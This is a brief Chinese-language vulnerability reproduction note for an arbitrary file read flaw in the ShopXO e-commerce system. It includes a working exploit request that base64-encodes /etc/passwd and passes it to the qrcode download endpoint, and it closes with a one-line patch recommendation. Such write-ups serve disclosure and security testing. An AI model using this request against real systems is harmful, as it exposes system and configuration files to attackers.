漏洞描述:
ShopXO是一套开源的企业级开源电子商务系统。 ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。
复现过程:
1.访问http://ip:port,出现如下页面,开始实验
2.使用burp抓取页面的包,并发至重发器
3.将要访问的文件进行base64编码 ,我这里选取的是/etc/passwd
L2V0Yy9wYXNzd2Q=
4.修改get请求,读取/etc/passwd
/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=
借此漏洞,可以访问攻击者想要的敏感数据,包括配置文件、日志、源代码等信息,更加方便攻击者对网站进行渗透。
修复建议:
1.打补丁。